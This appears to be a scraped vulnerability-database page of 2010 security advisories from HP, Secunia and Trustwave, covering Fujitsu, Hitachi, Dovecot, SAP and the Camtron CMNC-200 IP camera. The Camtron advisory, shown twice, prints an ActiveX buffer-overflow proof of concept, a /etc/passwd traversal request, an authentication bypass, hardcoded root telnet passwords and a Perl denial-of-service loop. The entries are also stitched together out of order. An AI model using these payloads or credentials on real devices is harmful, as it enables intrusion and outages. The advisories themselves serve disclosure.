On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2010 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkzhBl0ACgkQ4B86/C0qfVnKygCg3C3tUUIdfs4kS2lwHfGa7ayn
UFsAoNqbOe7VIg0V4M/CdoHWlyTClza7
=/Da0
-----END PGP SIGNATURE-----
| VAR-201011-0281 | No CVE | Multiple Fujitsu Interstage Product Information Disclosure Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
Multiple Fujitsu Interstage products have security vulnerabilities that allow malicious users to obtain sensitive information. A vulnerability exists in the Interstage server that is configured and running a J2EE application, allowing an attacker to gain unauthorized access to files and directories.
This issue can be exploited to gain access to arbitrary files and directories and to obtain sensitive information. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Fujitsu Interstage Products Information Disclosure Vulnerability
SECUNIA ADVISORY ID:
SA42222
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42222/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42222
RELEASE DATE:
2010-11-16
DISCUSS ADVISORY:
http://secunia.com/advisories/42222/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42222/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42222
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Fujitsu Interstage
products, which can be exploited by malicious people to disclose
potentially sensitive information. No further
information is currently available.
Please see the vendor's advisory for a list of affected products and
versions.
SOLUTION:
Apply patches (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.fujitsu.com/global/support/software/security/products-f/interstage-201005e.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201103-0066 | CVE-2010-4773 | Hitachi EUR Product Unknown Code Execution Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Hitachi EUR Form Client before 05-10 -/D 2010.11.15 and 05-10-CA (* 2) 2010.11.15; Hitachi EUR Form Service before 05-10 -/D 2010.11.15; and uCosminexus EUR Form Service before 07-60 -/D 2010.11.15 on Windows, before 05-10 -/D 2010.11.15 and 07-50 -/D 2010.11.15 on Linux, and before 07-50 -/C 2010.11.15 on AIX; allows remote attackers to execute arbitrary code via unknown attack vectors. Multiple Hitachi products have security vulnerabilities that allow malicious users to compromise user systems. No detailed vulnerability details are provided at present, and an attacker who successfully exploited the vulnerability could execute arbitrary code. Successful exploits will compromise the application and possibly the underlying system. Failed exploit attempts will likely cause denial-of-service conditions. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi EUR Products Unspecified Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA42207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42207
RELEASE DATE:
2010-11-16
DISCUSS ADVISORY:
http://secunia.com/advisories/42207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Hitachi products, which
can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified error. No further
information is currently available.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS10-027/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201011-0021 | CVE-2010-4011 | Apple Mac OS X of Dovecot Vulnerable to reading email |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue.". Apple Mac OS X is prone to a remote memory-corruption vulnerability that affects Dovecot.
Successful exploits may allow attackers to obtain email that was intended for other recipients.
This issue affects Mac OS X Server 10.6 to 10.6.5. On systems where Dovecot is configured as a mail server, users may receive mail belonging to other users
| VAR-201011-0409 | No CVE | SAP NetWeaver 'Function Builder' Local Privilege Escalation Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
SAP NetWeaver is prone to a local privilege-escalation vulnerability.
Local attackers may exploit this issue to gain elevated privileges, which can lead to a complete compromise of an affected computer.
| VAR-201011-0100 | CVE-2010-4230 | Camtron CMNC-200 ActiveX Control Buffer Overflow Vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in a certain ActiveX control for the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to execute arbitrary code via a long string in the first argument to the connect method. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities.
Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device.
The vulnerable products are listed below:
Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable.
TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Camtron CMNC-200 Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA42229
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42229/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42229
RELEASE DATE:
2010-11-18
DISCUSS ADVISORY:
http://secunia.com/advisories/42229/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42229/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42229
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Wendel G. Henrique has reported a security issue and some
vulnerabilities in Camtron CMNC-200, which can be exploited by
malicious people to bypass certain security restrictions, disclose
potentially sensitive information, cause a DoS (Denial of Service),
and compromise a vulnerable system.
1) Input passed via the URL to the device's web server is not
properly verified before being used to read files. This can be
exploited to read arbitrary files via directory traversal attacks.
For more information:
SA42311
The vulnerabilities are reported in version V1.102A-008 / Board ID
66.
PROVIDED AND/OR DISCOVERED BY:
Wendel G. Henrique, Trustwave's SpiderLabs
ORIGINAL ADVISORY:
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. The most notable features are full HD support
(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input
and output alarm sensor, and integration with different DVR solutions.
Source: http://www.camtron.co.kr
Credit: Wendel G.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.
The example code below triggers the vulnerability.
<html>
<head><title>IPcam POC</title>
<script>
function Check(){
var bf1 = 'A';
while (bf1.length <= 6144) bf1 = bf1 + 'A';
obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 2: Directory Traversal in Camera Web Server
CVE: CVE-2010-4231
The CMNC-200 IP Camera has a built-in web server that
is enabled by default. The server is vulnerable to directory
transversal attacks, allowing access to any file on the
camera file system.
The following example will display the contents of
/etc/passwd:
GET /../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Because the web server runs as root, an attacker can read
critical files like /etc/shadow from the web-based
administration interface. Authentication is not required for
exploitation.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 3: Web Based Administration Interface Bypass
CVE: CVE-2010-4232
The CMNC-200 IP Camera has an administrative web
interface that does not handle authentication properly.
Using a properly formatted request, an attacker can bypass
the authentication mechanism.
The first example requires authentication:
http://www.ipcamera.com/system.html
When a second forward slash is placed after the hostname,
authentication is not required.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 4: Undocumented Default Accounts
CVE: CVE-2010-4233
The CMNC-200 IP Camera has undocumented default
accounts on its Linux operating system. These accounts can
be used to login via the cameras telnet interface, which
cannot be normally disabled. The usernames and passwords are
listed below.
User: root Password: m
User: mg3500 Password: merlin
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 5: Camera Denial of Service
CVE: CVE-2010-4234
The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.
Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.
The example code below is able to reboot the IP cameras in
less than a minute in a local network.
#!/usr/bin/perl
use LWP::UserAgent;
while (1 == 1){
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");
$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);
}
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Vendor Communication Timeline:
10/7/10 - Vendor contact attempted
10/21/10 - Vendor contact attempted
11/1/10 - Vendor contact attempted
11/11/10 - CVE numbers obtained
11/12/10 - Advisory public release
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201011-0102 | CVE-2010-4232 | Camtron CMNC-200 Full HD IP Camera of Web Vulnerability to bypass authentication in base management interface |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to bypass authentication via a // (slash slash) at the beginning of a URI, as demonstrated by the //system.html URI. The Camtron CMNC-200 is a webcam. Using the correct format request, the attacker can bypass the authentication mechanism: http://www.ipcamera.com//system.html. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities.
Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device.
The vulnerable products are listed below:
Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable.
TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. The vulnerability has been confirmed via the //system.html URI. The most notable features are full HD support
(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input
and output alarm sensor, and integration with different DVR solutions.
Source: http://www.camtron.co.kr
Credit: Wendel G. Henrique of Trustwave's SpiderLabs
CVE: CVE-2010-4230
CVE-2010-4231
CVE-2010-4232
CVE-2010-4233
CVE-2010-4244
Finding 1: Buffer Overflow in ActiveX Control
CVE: CVE-2010-4230
The CMNC-200 IP Camera ActiveX control identified by
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable
to a stack overflow on the first argument of the connect method.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.
The example code below triggers the vulnerability.
<html>
<head><title>IPcam POC</title>
<script>
function Check(){
var bf1 = 'A';
while (bf1.length <= 6144) bf1 = bf1 + 'A';
obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation. The server is vulnerable to directory
transversal attacks, allowing access to any file on the
camera file system.
The following example will display the contents of
/etc/passwd:
GET /../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Because the web server runs as root, an attacker can read
critical files like /etc/shadow from the web-based
administration interface. Authentication is not required for
exploitation.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
The first example requires authentication:
http://www.ipcamera.com/system.html
When a second forward slash is placed after the hostname,
authentication is not required.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 4: Undocumented Default Accounts
CVE: CVE-2010-4233
The CMNC-200 IP Camera has undocumented default
accounts on its Linux operating system. These accounts can
be used to login via the cameras telnet interface, which
cannot be normally disabled. The usernames and passwords are
listed below.
User: root Password: m
User: mg3500 Password: merlin
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 5: Camera Denial of Service
CVE: CVE-2010-4234
The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.
Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.
The example code below is able to reboot the IP cameras in
less than a minute in a local network.
#!/usr/bin/perl
use LWP::UserAgent;
while (1 == 1){
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");
$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);
}
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Vendor Communication Timeline:
10/7/10 - Vendor contact attempted
10/21/10 - Vendor contact attempted
11/1/10 - Vendor contact attempted
11/11/10 - CVE numbers obtained
11/12/10 - Advisory public release
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201011-0104 | CVE-2010-4234 | Camtron CMNC-200 Full HD IP Camera of Web Service disruption at the server (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The web server on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to cause a denial of service (device reboot) via a large number of requests in a short time interval. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities.
Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device.
The vulnerable products are listed below:
Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable.
TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Camtron CMNC-200 Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA42229
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42229/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42229
RELEASE DATE:
2010-11-18
DISCUSS ADVISORY:
http://secunia.com/advisories/42229/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42229/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42229
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Wendel G. Henrique has reported a security issue and some
vulnerabilities in Camtron CMNC-200, which can be exploited by
malicious people to bypass certain security restrictions, disclose
potentially sensitive information, cause a DoS (Denial of Service),
and compromise a vulnerable system.
1) Input passed via the URL to the device's web server is not
properly verified before being used to read files. This can be
exploited to read arbitrary files via directory traversal attacks.
2) The device does not properly restrict access to the administrative
web interface. This can be exploited to bypass the authentication
mechanism by e.g. appending a second forward slash ("/") after the
hostname.
3) Undocumented, hardcoded user accounts can be exploited to e.g.
gain access to the device via the telnet interface.
5) The device includes a vulnerable ActiveX control, which can be
exploited to compromise a user's system.
For more information:
SA42311
The vulnerabilities are reported in version V1.102A-008 / Board ID
66.
SOLUTION:
Restrict and filter network access via a firewall.
PROVIDED AND/OR DISCOVERED BY:
Wendel G. Henrique, Trustwave's SpiderLabs
ORIGINAL ADVISORY:
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
